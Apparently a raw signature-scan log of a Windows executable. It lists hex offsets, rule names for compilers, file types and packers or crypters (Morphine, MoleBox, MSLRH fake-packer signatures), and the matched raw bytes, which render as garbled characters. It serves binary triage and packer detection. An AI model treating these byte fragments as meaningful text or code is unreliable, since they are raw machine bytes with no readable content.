0 0x2c5a Microsoft_Visual_C_8_0_Debug_Detecton_2 :$Y  IAfB|Zbf None $1 at pe.entry_point
0 0x2c5f Microsoft_Visual_C_8_0_Debug_Detecton_2 $Y  IAfB|Zbf]= None $1 at pe.entry_point
0 0x2c64 Microsoft_Visual_C_8_0_Debug_Detecton_2 $Y  IAfB|Zbf]= None $1 at pe.entry_point
0 0x2c69 Microsoft_Visual_C_8_0_Debug_Detecton_2 $Y  IAfB|Zbf]=v None $1 at pe.entry_point
0 0x2c6e Microsoft_Visual_C_8_0_Debug_Detecton_2 Y  IAfB|Zbf]=v None $1 at pe.entry_point
0 0x2c73 Microsoft_Visual_C_8_0_Debug_Detecton_2  IAfB|Zbf]=v None $1 at pe.entry_point
0 0x2c78 Microsoft_Visual_C_8_0_Debug_Detecton_2 IAfB|Zbf]=v  None $1 at pe.entry_point
0 0x2c7d Microsoft_Visual_C_8_0_Debug_Detecton_2 IAfB|Zbf]=v , None $1 at pe.entry_point
0 0x2c82 Microsoft_Visual_C_8_0_Debug_Detecton_2 IAfB|Zbf]=v ,颲 None $1 at pe.entry_point
0 0x2c87 Microsoft_Visual_C_8_0_Debug_Detecton_2 AfB|Zbf]=v ,颲鵖 None $1 at pe.entry_point
0 0x2c8c Microsoft_Visual_C_8_0_Debug_Detecton_2 AfB|Zbf]=v ,颲鵖 None $1 at pe.entry_point
0 0x2c91 Microsoft_Visual_C_8_0_Debug_Detecton_2 fB|Zbf]=v ,颲鵖7 None $1 at pe.entry_point
0 0x2c96 Microsoft_Visual_C_8_0_Debug_Detecton_2 |Zbf]=v ,颲鵖7 None $1 at pe.entry_point
0 0x2c9b Microsoft_Visual_C_8_0_Debug_Detecton_2 Zbf]=v ,颲鵖7 None $1 at pe.entry_point
0 0x2ca0 Microsoft_Visual_C_8_0_Debug_Detecton_2 bf]=v ,颲鵖7 None $1 at pe.entry_point
0 0x2ca5 Microsoft_Visual_C_8_0_Debug_Detecton_2 bf]=v ,颲鵖7B None $1 at pe.entry_point
0 0x2caa Microsoft_Visual_C_8_0_Debug_Detecton_2 ]=v ,颲鵖7B^ None $1 at pe.entry_point
0 0x2caf Microsoft_Visual_C_8_0_Debug_Detecton_2 v ,颲鵖7B^> None $1 at pe.entry_point
0 0x2cb4 Microsoft_Visual_C_8_0_Debug_Detecton_2 v ,颲鵖7B^> None $1 at pe.entry_point
0 0x2cb9 Microsoft_Visual_C_8_0_Debug_Detecton_2  ,颲鵖7B^> None $1 at pe.entry_point
0 0x2cbe Microsoft_Visual_C_8_0_Debug_Detecton_2  ,颲鵖7B^>鲯 None $1 at pe.entry_point
0 0x2cc3 Microsoft_Visual_C_8_0_Debug_Detecton_2 ,颲鵖7B^>鲯i None $1 at pe.entry_point
0 0x2cc8 Microsoft_Visual_C_8_0_Debug_Detecton_2 ,颲鵖7B^>鲯i None $1 at pe.entry_point
0 0x2ccd Microsoft_Visual_C_8_0_Debug_Detecton_2 颲鵖7B^>鲯iw None $1 at pe.entry_point
0 0x2cd2 Microsoft_Visual_C_8_0_Debug_Detecton_2 鵖7B^>鲯iw: None $1 at pe.entry_point
0 0x2cd7 Microsoft_Visual_C_8_0_Debug_Detecton_2 7B^>鲯iw:= None $1 at pe.entry_point
0 0x2cdc Microsoft_Visual_C_8_0_Debug_Detecton_2 7B^>鲯iw:= None $1 at pe.entry_point
0 0x2ce1 Microsoft_Visual_C_8_0_Debug_Detecton_2 B^>鲯iw:=0 None $1 at pe.entry_point
0 0x2ce6 Microsoft_Visual_C_8_0_Debug_Detecton_2 B^>鲯iw:=0 None $1 at pe.entry_point
0 0x2ceb Microsoft_Visual_C_8_0_Debug_Detecton_2 B^>鲯iw:=0鱽 None $1 at pe.entry_point
0 0x2cf0 Microsoft_Visual_C_8_0_Debug_Detecton_2 B^>鲯iw:=0鱽h None $1 at pe.entry_point
0 0x2cf5 Microsoft_Visual_C_8_0_Debug_Detecton_2 ^>鲯iw:=0鱽h$ None $1 at pe.entry_point
0 0x2cfa Microsoft_Visual_C_8_0_Debug_Detecton_2 >鲯iw:=0鱽h$r None $1 at pe.entry_point
0 0x2cff Microsoft_Visual_C_8_0_Debug_Detecton_2 鲯iw:=0鱽h$r陫 None $1 at pe.entry_point
0 0x2d04 Microsoft_Visual_C_8_0_Debug_Detecton_2 鲯iw:=0鱽h$r陫  None $1 at pe.entry_point
0 0x2d09 Microsoft_Visual_C_8_0_Debug_Detecton_2 鲯iw:=0鱽h$r陫 kW None $1 at pe.entry_point
0 0x2d0e Microsoft_Visual_C_8_0_Debug_Detecton_2 iw:=0鱽h$r陫 kW* None $1 at pe.entry_point
0 0x2d13 Microsoft_Visual_C_8_0_Debug_Detecton_2 w:=0鱽h$r陫 kW* Q None $1 at pe.entry_point
0 0x2d18 Microsoft_Visual_C_8_0_Debug_Detecton_2 w:=0鱽h$r陫 kW* Q None $1 at pe.entry_point
0 0x2d1d Microsoft_Visual_C_8_0_Debug_Detecton_2 :=0鱽h$r陫 kW* Q None $1 at pe.entry_point
0 0x2d22 Microsoft_Visual_C_8_0_Debug_Detecton_2 =0鱽h$r陫 kW* Q None $1 at pe.entry_point
0 0x2d27 Microsoft_Visual_C_8_0_Debug_Detecton_2 0鱽h$r陫 kW* Q%  None $1 at pe.entry_point
0 0x2d2c Microsoft_Visual_C_8_0_Debug_Detecton_2 0鱽h$r陫 kW* Q% > None $1 at pe.entry_point
0 0x2d31 Microsoft_Visual_C_8_0_Debug_Detecton_2 鱽h$r陫 kW* Q% >1 None $1 at pe.entry_point
0 0x2d36 Microsoft_Visual_C_8_0_Debug_Detecton_2 鱽h$r陫 kW* Q% >1骙 None $1 at pe.entry_point
0 0x2d3b Microsoft_Visual_C_8_0_Debug_Detecton_2 h$r陫 kW* Q% >1骙M None $1 at pe.entry_point
0 0x2d40 Microsoft_Visual_C_8_0_Debug_Detecton_2 $r陫 kW* Q% >1骙MG None $1 at pe.entry_point
0 0x2d45 Microsoft_Visual_C_8_0_Debug_Detecton_2 r陫 kW* Q% >1骙MG None $1 at pe.entry_point
0 0x2d4a Microsoft_Visual_C_8_0_Debug_Detecton_2 陫 kW* Q% >1骙MG: None $1 at pe.entry_point
0 0x2d4f Microsoft_Visual_C_8_0_Debug_Detecton_2 kW* Q% >1骙MG: None $1 at pe.entry_point
0 0x2d54 Microsoft_Visual_C_8_0_Debug_Detecton_2 kW* Q% >1骙MG:D None $1 at pe.entry_point
0 0x2d59 Microsoft_Visual_C_8_0_Debug_Detecton_2 * Q% >1骙MG:Dl None $1 at pe.entry_point
0 0x2d5e Microsoft_Visual_C_8_0_Debug_Detecton_2 Q% >1骙MG:Dl钶 None $1 at pe.entry_point
0 0x2d63 Microsoft_Visual_C_8_0_Debug_Detecton_2 % >1骙MG:Dl钶 None $1 at pe.entry_point
0 0x2d68 Microsoft_Visual_C_8_0_Debug_Detecton_2 % >1骙MG:Dl钶 None $1 at pe.entry_point
0 0x2d6d Microsoft_Visual_C_8_0_Debug_Detecton_2 % >1骙MG:Dl钶3 None $1 at pe.entry_point
0 0x2d72 Microsoft_Visual_C_8_0_Debug_Detecton_2 % >1骙MG:Dl钶3n None $1 at pe.entry_point
0 0x2d77 Microsoft_Visual_C_8_0_Debug_Detecton_2 >1骙MG:Dl钶3na' None $1 at pe.entry_point
0 0x2d7c Microsoft_Visual_C_8_0_Debug_Detecton_2 1骙MG:Dl钶3na' None $1 at pe.entry_point
0 0x2d81 Microsoft_Visual_C_8_0_Debug_Detecton_2 骙MG:Dl钶3na'v None $1 at pe.entry_point
0 0x2d86 Microsoft_Visual_C_8_0_Debug_Detecton_2 MG:Dl钶3na'vr None $1 at pe.entry_point
0 0x2d8b Microsoft_Visual_C_8_0_Debug_Detecton_2 G:Dl钶3na'vr) None $1 at pe.entry_point
0 0x2d90 Microsoft_Visual_C_8_0_Debug_Detecton_2 :Dl钶3na'vr)X None $1 at pe.entry_point
0 0x2d95 Microsoft_Visual_C_8_0_Debug_Detecton_2 :Dl钶3na'vr)XS$ None $1 at pe.entry_point
0 0x2d9a Microsoft_Visual_C_8_0_Debug_Detecton_2 Dl钶3na'vr)XS$¯ None $1 at pe.entry_point
0 0x2d9f Microsoft_Visual_C_8_0_Debug_Detecton_2 Dl钶3na'vr)XS$¯ None $1 at pe.entry_point
0 0x2da4 Microsoft_Visual_C_8_0_Debug_Detecton_2 l钶3na'vr)XS$¯t None $1 at pe.entry_point
0 0x2da9 Microsoft_Visual_C_8_0_Debug_Detecton_2 钶3na'vr)XS$¯t3, None $1 at pe.entry_point
0 0x2dae Microsoft_Visual_C_8_0_Debug_Detecton_2 3na'vr)XS$¯t3, None $1 at pe.entry_point
0 0x2db3 Microsoft_Visual_C_8_0_Debug_Detecton_2 3na'vr)XS$¯t3,Y None $1 at pe.entry_point
0 0x2db8 Microsoft_Visual_C_8_0_Debug_Detecton_2 3na'vr)XS$¯t3,Yr None $1 at pe.entry_point
0 0x2dbd Microsoft_Visual_C_8_0_Debug_Detecton_2 na'vr)XS$¯t3,Yr߂ None $1 at pe.entry_point
0 0x2dc2 Microsoft_Visual_C_8_0_Debug_Detecton_2 a'vr)XS$¯t3,Yr߂  None $1 at pe.entry_point
0 0x2dc7 Microsoft_Visual_C_8_0_Debug_Detecton_2 vr)XS$¯t3,Yr߂ YR None $1 at pe.entry_point
0 0x2dcc Microsoft_Visual_C_8_0_Debug_Detecton_2 vr)XS$¯t3,Yr߂ YR None $1 at pe.entry_point
0 0x2dd1 Microsoft_Visual_C_8_0_Debug_Detecton_2 r)XS$¯t3,Yr߂ YR None $1 at pe.entry_point
0 0x2dd6 Microsoft_Visual_C_8_0_Debug_Detecton_2 )XS$¯t3,Yr߂ YRj) None $1 at pe.entry_point
0 0x2ddb Microsoft_Visual_C_8_0_Debug_Detecton_2 XS$¯t3,Yr߂ YRj) None $1 at pe.entry_point
0 0x2de0 Microsoft_Visual_C_8_0_Debug_Detecton_2 S$¯t3,Yr߂ YRj)О None $1 at pe.entry_point
0 0x2de5 Microsoft_Visual_C_8_0_Debug_Detecton_2 ¯t3,Yr߂ YRj)О. None $1 at pe.entry_point
0 0x2dea Microsoft_Visual_C_8_0_Debug_Detecton_2 t3,Yr߂ YRj)О. None $1 at pe.entry_point
0 0x2def Microsoft_Visual_C_8_0_Debug_Detecton_2 t3,Yr߂ YRj)О.-H None $1 at pe.entry_point
0 0x2df4 Microsoft_Visual_C_8_0_Debug_Detecton_2 3,Yr߂ YRj)О.-H : None $1 at pe.entry_point
0 0x2df9 Microsoft_Visual_C_8_0_Debug_Detecton_2 Yr߂ YRj)О.-H :; None $1 at pe.entry_point
0 0x2dfe Microsoft_Visual_C_8_0_Debug_Detecton_2 Yr߂ YRj)О.-H :; None $1 at pe.entry_point
0 0x2e03 Microsoft_Visual_C_8_0_Debug_Detecton_2 r߂ YRj)О.-H :; None $1 at pe.entry_point
0 0x2e08 Microsoft_Visual_C_8_0_Debug_Detecton_2 ߂ YRj)О.-H :;# None $1 at pe.entry_point
0 0x2e0d Microsoft_Visual_C_8_0_Debug_Detecton_2  YRj)О.-H :;# None $1 at pe.entry_point
0 0x2e12 Microsoft_Visual_C_8_0_Debug_Detecton_2 YRj)О.-H :;# None $1 at pe.entry_point
0 0x2e17 Microsoft_Visual_C_8_0_Debug_Detecton_2 j)О.-H :;#% None $1 at pe.entry_point
0 0x2e1c Microsoft_Visual_C_8_0_Debug_Detecton_2 j)О.-H :;#%= None $1 at pe.entry_point
0 0x2e21 Microsoft_Visual_C_8_0_Debug_Detecton_2 j)О.-H :;#%= None $1 at pe.entry_point
0 0x2e26 Microsoft_Visual_C_8_0_Debug_Detecton_2 О.-H :;#%=6 None $1 at pe.entry_point
0 0x2e2b Microsoft_Visual_C_8_0_Debug_Detecton_2 О.-H :;#%=6e None $1 at pe.entry_point
0 0x2e30 Microsoft_Visual_C_8_0_Debug_Detecton_2 .-H :;#%=6e None $1 at pe.entry_point
0 0x2e35 Microsoft_Visual_C_8_0_Debug_Detecton_2 -H :;#%=6e6 None $1 at pe.entry_point
0 0x2e3a Microsoft_Visual_C_8_0_Debug_Detecton_2 -H :;#%=6e6 None $1 at pe.entry_point
4 0x1742c1 0x1742c6 0x1742cb 0x1742d0 0x1742d5 Microsoft_Visual_C_8_0_Debug_Detecton_2 None $1 at pe.entry_point
1 0x192556 0x1925a7 Microsoft_Visual_C_8_0_Detecton_Number_2 =thYt t$YhhYYuTVWhƿ None $1
1 0x153ac4 0x18e7fa Microsoft_Visual_C_v6_0_Detecton_1 Ujha@hp;@dPd%XSVW None $1
0 0x1542af Microsoft_Visual_C_v6_0_Detecton_1 Ujh@BhBdPd%XSVW None $1
0 0x15466b Microsoft_Visual_C_v6_0_Detecton_1 Ujhh`dPd%XSVW None $1
0 0x15523a Microsoft_Visual_C_v6_0_Detecton_1 Ujhh$dPd%XSVW None $1
0 0x15526d Microsoft_Visual_C_v6_0_Detecton_1 UjhPhtdPd%XSVW None $1
0 0x1573ba Microsoft_Visual_C_v6_0_Detecton_1 Ujh8h@dPd%XSVW None $1
0 0x157fa7 Microsoft_Visual_C_v6_0_Detecton_1 Ujhh4dPd%XSVW None $1
0 0x157fda Microsoft_Visual_C_v6_0_Detecton_1 Ujh(hdPd%XSVW None $1
1 0x158450 0x1767cb Microsoft_Visual_C_v6_0_Detecton_1 UjhDh BdPd%XSVW None $1
0 0x15a37f Microsoft_Visual_C_v6_0_Detecton_1 Ujh@hTdPd%XSVW None $1
2 0x15a413 0x15a43c 0x15a465 Microsoft_Visual_C_v6_0_Detecton_1 UjhhdPd%XSVW None $1
0 0x15be14 Microsoft_Visual_C_v6_0_Detecton_1 Ujh@@h@dPd%XSVW None $1
1 0x15e4f4 0x188011 Microsoft_Visual_C_v6_0_Detecton_1 Ujh KhHdPd%XSVW None $1
0 0x15f9e3 Microsoft_Visual_C_v6_0_Detecton_1 UjhhBhAdPd%XSVW None $1
0 0x1644ac Microsoft_Visual_C_v6_0_Detecton_1 UjhhhdPd%XSVW None $1
0 0x1655e3 Microsoft_Visual_C_v6_0_Detecton_1 UjhhdPd%XSVW None $1
0 0x16560b Microsoft_Visual_C_v6_0_Detecton_1 UjhhhdPd%XSVW None $1
1 0x165a10 0x180d80 Microsoft_Visual_C_v6_0_Detecton_1 Ujh@h@dPd%XSVW None $1
2 0x165a63 0x168869 0x18c6ab Microsoft_Visual_C_v6_0_Detecton_1 Ujh@hdPd%XSVW None $1
0 0x16889c Microsoft_Visual_C_v6_0_Detecton_1 UjhhdPd%XSVW None $1
0 0x16984d Microsoft_Visual_C_v6_0_Detecton_1 UjhhdPd%XSVW None $1
1 0x16bae8 0x196a62 Microsoft_Visual_C_v6_0_Detecton_1 UjhKCUFhTIHSdPd%hSVW None $1
3 0x16ca70 0x16f674 0x17b063 0x192a53 Microsoft_Visual_C_v6_0_Detecton_1 UjhLhIdPd%XSVW None $1
0 0x16def4 Microsoft_Visual_C_v6_0_Detecton_1 Ujh@h@dPd%DSVW None $1
0 0x16fc28 Microsoft_Visual_C_v6_0_Detecton_1 UjhhdPd%XSVW None $1
0 0x171c67 Microsoft_Visual_C_v6_0_Detecton_1 Ujh@hD@dPd%XSVW None $1
0 0x174de8 Microsoft_Visual_C_v6_0_Detecton_1 UjhHBhAdPd%XSVW None $1
0 0x176361 Microsoft_Visual_C_v6_0_Detecton_1 UjhP@hi@dPd%XSVW None $1
0 0x177753 Microsoft_Visual_C_v6_0_Detecton_1 UjhhdPd%SVW None $1
0 0x177d6e Microsoft_Visual_C_v6_0_Detecton_1 Ujh@h@dPd%XSVW None $1
0 0x1824ca Microsoft_Visual_C_v6_0_Detecton_1 Ujh;BhAdPd%XSVW None $1
0 0x18ad69 Microsoft_Visual_C_v6_0_Detecton_1 Ujha@hC@dPd%XSVW None $1
0 0x19218f Microsoft_Visual_C_v6_0_Detecton_1 Ujh@h@dPd%SVW None $1
0 0x19414c Microsoft_Visual_C_v6_0_Detecton_1 Ujh3Ah@dPd%XSVW None $1
1 0x153ac4 0x18e7fa Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujha@hp;@dPd%XSVWea@3Ҋԉ\@ȁ None $1
0 0x1542af Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujh@BhBdPd%XSVWeB3Ҋԉ`BCȁ None $1
1 0x158450 0x1767cb Microsoft_Visual_C_v6_0_Detecton_Number_3 UjhDh BdPd%XSVWeLAD3ҊԉDȁ None $1
1 0x15e4f4 0x188011 Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujh KhHdPd%XSVWe1K3ҊԉKȁ None $1
0 0x15f9e3 Microsoft_Visual_C_v6_0_Detecton_Number_3 UjhhBhAdPd%XSVWePB3Ҋԉ<Bȁ None $1
1 0x165a10 0x180d80 Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujh@h@dPd%XSVWe@3Ҋԉ@ȁ None $1
1 0x165a63 0x18c6ab Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujh@hdPd%XSVWe3Ҋԉ0ȁ None $1
1 0x16ca70 0x17b063 Microsoft_Visual_C_v6_0_Detecton_Number_3 UjhLhIdPd%XSVWe1L3Ҋԉ|Lȁ None $1
1 0x16f674 0x192a53 Microsoft_Visual_C_v6_0_Detecton_Number_3 UjhLhIdPd%XSVWe1L3ҊԉLȁ None $1
0 0x171c67 Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujh@hD@dPd%XSVWeh@3ҊԉkAȁ None $1
0 0x174de8 Microsoft_Visual_C_v6_0_Detecton_Number_3 UjhHBhAdPd%XSVWe1B3ҊԉBȁ None $1
0 0x176361 Microsoft_Visual_C_v6_0_Detecton_Number_3 UjhP@hi@dPd%XSVWe@3Ҋԉ@ȁ None $1
0 0x177d6e Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujh@h@dPd%XSVWe@3Ҋԉ@ȁ None $1
0 0x1824ca Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujh;BhAdPd%XSVWe1B3ҊԉBȁ None $1
0 0x18ad69 Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujha@hC@dPd%XSVWea@3Ҋԉ@ȁ None $1
0 0x19218f Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujh@h@dPd%SVWe@3Ҋԉ@ȁ None $1
0 0x19414c Microsoft_Visual_C_v6_0_Detecton_Number_3 Ujh3Ah@dPd%XSVWe1A3Ҋԉ\cAȁ None $1
0 0x18942f Microsoft_Visual_C_v7_0_64_Bit_Detecton_Number_2 Ac None $1
0 0x17ae68 Microsoft_Visual_C_v7_0_DLL_Detecton_1 US]Vu W} None $1
0 0x15376b Microsoft_Visual_C_Detecton_Number_2 Ujh@hƎ@dPd% None $1
1 0x153ac4 0x18e7fa Microsoft_Visual_C_Detecton_Number_2 Ujha@hp;@dPd% None $1
6 0x153b28 0x1613a1 0x169fd4 0x16fc28 0x177753 0x17dc09 0x1855af Microsoft_Visual_C_Detecton_Number_2 UjhhdPd% None $1
0 0x153c45 Microsoft_Visual_C_Detecton_Number_2 UjhAhĠ@dPd% None $1
0 0x153c65 Microsoft_Visual_C_Detecton_Number_2 UjhAh@dPd% None $1
5 0x153ce0 0x15b7bb 0x1630e0 0x163135 0x1676e4 0x192bbb Microsoft_Visual_C_Detecton_Number_2 Ujh 2hdPd% None $1
0 0x1542af Microsoft_Visual_C_Detecton_Number_2 Ujh@BhBdPd% None $1
0 0x15466b Microsoft_Visual_C_Detecton_Number_2 Ujhh`dPd% None $1
0 0x15523a Microsoft_Visual_C_Detecton_Number_2 Ujhh$dPd% None $1
0 0x15526d Microsoft_Visual_C_Detecton_Number_2 UjhPhtdPd% None $1
1 0x15601c 0x162598 Microsoft_Visual_C_Detecton_Number_2 Ujh7Ah8AdPd% None $1
0 0x1573ba Microsoft_Visual_C_Detecton_Number_2 Ujh8h@dPd% None $1
0 0x157fa7 Microsoft_Visual_C_Detecton_Number_2 Ujhh4dPd% None $1
0 0x157fda Microsoft_Visual_C_Detecton_Number_2 Ujh(hdPd% None $1
1 0x158450 0x1767cb Microsoft_Visual_C_Detecton_Number_2 UjhDh BdPd% None $1
0 0x15a37f Microsoft_Visual_C_Detecton_Number_2 Ujh@hTdPd% None $1
2 0x15a413 0x15a43c 0x15a465 Microsoft_Visual_C_Detecton_Number_2 UjhhdPd% None $1
1 0x15aea6 0x168618 Microsoft_Visual_C_Detecton_Number_2 Ujh@h@dPd% None $1
0 0x15be14 Microsoft_Visual_C_Detecton_Number_2 Ujh@@h@dPd% None $1
1 0x15e4f4 0x188011 Microsoft_Visual_C_Detecton_Number_2 Ujh KhHdPd% None $1
0 0x15e549 Microsoft_Visual_C_Detecton_Number_2 Ujhq@hH-@dPd% None $1
0 0x15f8b3 Microsoft_Visual_C_Detecton_Number_2 UjhhdPd% None $1
0 0x15f9e3 Microsoft_Visual_C_Detecton_Number_2 UjhhBhAdPd% None $1
0 0x161c26 Microsoft_Visual_C_Detecton_Number_2 Ujh@ht@dPd% None $1
1 0x162dda 0x1685f8 Microsoft_Visual_C_Detecton_Number_2 Ujh@h@dPd% None $1
0 0x162dfa Microsoft_Visual_C_Detecton_Number_2 Ujh@hd@dPd% None $1
0 0x162e1a Microsoft_Visual_C_Detecton_Number_2 Ujh@ht@dPd% None $1
0 0x1644ac Microsoft_Visual_C_Detecton_Number_2 UjhhhdPd% None $1
0 0x165000 Microsoft_Visual_C_Detecton_Number_2 UjhAh$@dPd% None $1
0 0x165020 Microsoft_Visual_C_Detecton_Number_2 Ujh@hd@dPd% None $1
0 0x16543d Microsoft_Visual_C_Detecton_Number_2 Ujhq@hl7@dPd% None $1
0 0x1655e3 Microsoft_Visual_C_Detecton_Number_2 UjhhdPd% None $1
0 0x16560b Microsoft_Visual_C_Detecton_Number_2 UjhhhdPd% None $1
1 0x165a10 0x180d80 Microsoft_Visual_C_Detecton_Number_2 Ujh@h@dPd% None $1
2 0x165a63 0x168869 0x18c6ab Microsoft_Visual_C_Detecton_Number_2 Ujh@hdPd% None $1
0 0x16749d Microsoft_Visual_C_Detecton_Number_2 Ujh@hV@dPd% None $1
0 0x167634 Microsoft_Visual_C_Detecton_Number_2 Ujh@hĠ@dPd% None $1
0 0x16854a Microsoft_Visual_C_Detecton_Number_2 Ujh1Ah2AdPd% None $1
0 0x1685d8 Microsoft_Visual_C_Detecton_Number_2 Ujh@h@dPd% None $1
0 0x16889c Microsoft_Visual_C_Detecton_Number_2 UjhhdPd% None $1
0 0x16984d Microsoft_Visual_C_Detecton_Number_2 UjhhdPd% None $1
1 0x16bae8 0x196a62 Microsoft_Visual_C_Detecton_Number_2 UjhKCUFhTIHSdPd% None $1
3 0x16ca70 0x16f674 0x17b063 0x192a53 Microsoft_Visual_C_Detecton_Number_2 UjhLhIdPd% None $1
0 0x16d53f Microsoft_Visual_C_Detecton_Number_2 UjhAh@dPd% None $1
5 0x16def4 0x171b9d 0x177d6e 0x190faa 0x19218f 0x195b85 Microsoft_Visual_C_Detecton_Number_2 Ujh@h@dPd% None $1
0 0x16df19 Microsoft_Visual_C_Detecton_Number_2 Ujh0Ah@dPd% None $1
1 0x16eb87 0x17989b Microsoft_Visual_C_Detecton_Number_2 UjhhdPd% None $1
0 0x171c67 Microsoft_Visual_C_Detecton_Number_2 Ujh@hD@dPd% None $1
0 0x174de8 Microsoft_Visual_C_Detecton_Number_2 UjhHBhAdPd% None $1
0 0x176361 Microsoft_Visual_C_Detecton_Number_2 UjhP@hi@dPd% None $1
0 0x181b25 Microsoft_Visual_C_Detecton_Number_2 Ujh@hĝ@dPd% None $1
0 0x1824ca Microsoft_Visual_C_Detecton_Number_2 Ujh;BhAdPd% None $1
0 0x18ad69 Microsoft_Visual_C_Detecton_Number_2 Ujha@hC@dPd% None $1
0 0x18ee89 Microsoft_Visual_C_Detecton_Number_2 UjhBhAdPd% None $1
0 0x18fede Microsoft_Visual_C_Detecton_Number_2 UjhAh@dPd% None $1
0 0x19414c Microsoft_Visual_C_Detecton_Number_2 Ujh3Ah@dPd% None $1
0 0x179eca Microsoft_WAV_Audio_file_Detecton_1 RIFFWAVEfmt None $1
0 0x183b6d Microsoft_Windows_Shortcut_file_Detecton_1 L None $1
1 0x1828ba 0x1838e7 Microsoft_Windows_Update_CAB_SFX_module_Detecton_1 UVuhY3;uQju(.3iU PUP UPUPU P None $1
0 0x1838e7 Microsoft_Windows_Update_CAB_SFX_module_Detecton_Number_2 UVuhY3;uQju(.3iU PUP UPUPU PU P U$P U(HHHDHLpfǀ None $1
0 0x176f09 MIDI_Music_file_Detecton_1 MThdMT None $1
1 0x172469 0x1937ed MinGW_3_2_x_Dll_main_Detecton_1 Uuu ]t\t$UT$U$ t,u 0u1ۉ؋]u] Y None $1
1 0x171a36 0x17faab MinGW_3_2_x_Dll_WinMain_Detecton_1 Uuu ]t\t$UT$U$v t,u 0u1ۉ؋]u] Y None $1
1 0x1719e1 0x1848b1 MinGW_3_2_x_main_Detecton_1 U$@@h1]ÉU$@@H1]ÉUU$A@] None $1
1 0x17d524 0x18b99b MinGW_3_2_x_WinMain_Detecton_1 U$@@h1]ÉU$@@H1]ÉUU$A@] None $1
0 0x167323 Minke_V1_0_1_Detecton_1 &=O8‚7$B:dStubUTypesSystemSysInit KWindowsuFunctions None $1
0 0x165e52 mkfpack_Detecton_1 [Sj@hRj2[VWRS None $1
0 0x15a8c8 MoleBox_v2_3_0_Detecton_1 BME_^]XXD$ aX None $1
0 0x163add MoleBox_v2_5_4_Detecton_1 d%ME_^]XXD$$aXXj None $1
0 0x18578f MoleBox_v2_5_4_Detecton_1 ME_^]XXD$$aXXj None $1
3 0x161ace 0x17bf50 0x1811aa 0x1938f0 Morphine_2_7_Detecton_1 kernel32.dllGetProc None $1
1 0x161a7d 0x1811e6 Morphine_2_7_Detecton_Number_2 kernel32.dllGetProcAddressLoadLibraryA None $1
0 0x16ac68 Morphine_3_3_Detecton_1 @4L\L\KeRnEl32.dLlGetProcAddr None $1
1 0x16f397 0x17604f Morphine_3_3_Detecton_1 KeRnEl32.dLlGetProcAddr None $1
1 0x16ac0f 0x16ac64 Morphine_3_3_Detecton_Number_2 (@4L\L\KeRnEl32.dLlGetProc None $1
0 0x195aba Morphine_v1_2_v1_3_Detecton_1 %4Z%8Z None $1
0 0x1811aa Morphine_v2_7_Detecton_1 kernel32.dllGetProcAddressLoadLibraryA None $1
1 0x161a7d 0x1811e6 Morphine_v2_7_Detecton_Number_2 kernel32.dllGetProcAddressLoadLibraryA None $1
0 0x16ac68 Morphine_V3_3_Detecton_1 @4L\L\KeRnEl32.dLlGetProcAddressLoadLibraryA None $1
0 0x17604f Morphine_V3_3_Detecton_1 KeRnEl32.dLlGetProcAddressLoadLibraryA None $1
0 0x16ac64 Morphine_v3_3_Detecton_1 (@4L\L\KeRnEl32.dLlGetProcAddressLoadLibraryA None $1
0 0x179ef9 MPEG_movie_file_Detecton_1 /a None $1
0 0x17cc37 MS_Visual_C_v_8_h_good_sig_but_is_it_MSVC_Detecton_1 f=MZt3Q<PEu t uԃv39 None $1
0 0x16c448 MSLRH_0_32a_fake_BJFNT_1_3_Detecton_1 :M:    ` X@Pa@ tuP None $1
0 0x1577f5 MSLRH_0_32a_fake_ASPack_2_11d_Detecton_1 ` ]U99Da@ tuP)ZXk)ZXtu None $1
0 0x15800d MSLRH_0_32a_fake_ASPack_2_12_Detecton_Number_2 `]EU]݁@ tuP)ZXk None $1
0 0x15ffb0 MSLRH_0_32a_fake_EXE32Pack_1_3x_Detecton_1 ;tU;tS;tV;tW;t@ tuP None $1
0 0x15601c MSLRH_0_32a_fake_Microsoft_Visual_C_Detecton_1 Ujh7Ah8AdPd%d ]@ tuP None $1
0 0x169e25 MSLRH_0_32a_fake_MSVC_6_0_DLL_Detecton_1 US]Vu W}_^[]@ tuP)ZXk)ZX None $1
0 0x169539 MSLRH_0_32a_fake_MSVC_7_0_DLL_Method_3_Detecton_1 US]Vu ^[]@ tuP)ZXk)ZXtu None $1
0 0x16dfbc MSLRH_0_32a_fake_MSVC_DLL_Method_4_Detecton_1 UVWu _^]@ tuP)ZXk)ZXtu None $1
0 0x16f0b8 MSLRH_0_32a_fake_Neolite_2_0_Detecton_1 {@x`@|`@?b@NeoLite Executable File Compressor Copyright (c) 1998,1 None $1
0 0x15e32d MSLRH_0_32a_fake_nSPack_1_3_Detecton_1 `]@-@+荵ta@ t None $1
0 0x152d08 MSLRH_0_32a_fake_PC_Guard_4_xx_Detecton_1 UP]` XH@5aX]@ tuP)ZX None $1
0 0x16ad54 MSLRH_0_32a_fake_PE_Crypt_1_02_Detecton_1 [RND!sPX  XX@ tu None $1
0 0x15907f MSLRH_0_32a_fake_PE_Lock_NT_2_04_Detecton_1   ` X@P  a@ None $1
0 0x1601dc MSLRH_0_32a_fake_PEBundle_0_2_3_x_Detecton_1 `3ă[0@a@ tuP)ZXk None $1
0 0x15ae1f MSLRH_0_32a_fake_PEBundle_2_0x_2_4x_Detecton_1 `3ă[0@݃8@a@ tuP) None $1
0 0x168435 MSLRH_0_32a_fake_PECompact_1_4x_Detecton_1 h.Ü`3ă[?@a@ tuP)Z None $1
0 0x163678 MSLRH_0_32a_fake_PESHiELD_0_25_Detecton_1 `+ RegistAred to: NON-COMMERCIAL!! Xa@ t None $1
0 0x166c55 MSLRH_0_32a_fake_PEtite_2_1_Detecton_1 P@jh!@d5d%f`Pafd@ tu None $1
0 0x159905 MSLRH_0_32a_fake_PEX_0_99_Detecton_1 `]"@a@ tuP)ZXk)Z None $1
0 0x15bea9 MSLRH_0_32a_fake_SVKP_1_11_Detecton_1 `]d#a@ tuP)ZXk)Z None $1
0 0x16e040 MSLRH_0_32a_fake_UPX_0_89_6_1_02_1_05_1_24_Detecton_1 `W:FGu ru s u rXa@ None $1
